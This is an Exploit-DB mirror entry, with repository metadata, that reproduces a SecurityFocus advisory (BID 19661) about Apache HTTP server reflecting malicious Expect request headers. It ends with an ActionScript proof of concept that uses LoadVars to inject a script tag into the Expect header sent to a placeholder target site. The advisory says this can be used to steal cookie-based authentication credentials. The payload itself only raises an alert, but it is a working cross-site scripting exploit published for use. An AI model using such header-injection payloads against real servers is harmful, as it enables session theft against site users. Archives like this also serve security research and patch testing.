exploit-db-mirror/platforms/linux/remote/28424.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

10 lines
No EOL
411 B
Text
Executable file

source: http://www.securityfocus.com/bid/19661/info
Apache HTTP server is prone to a security weakness related to HTTP request headers.
An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");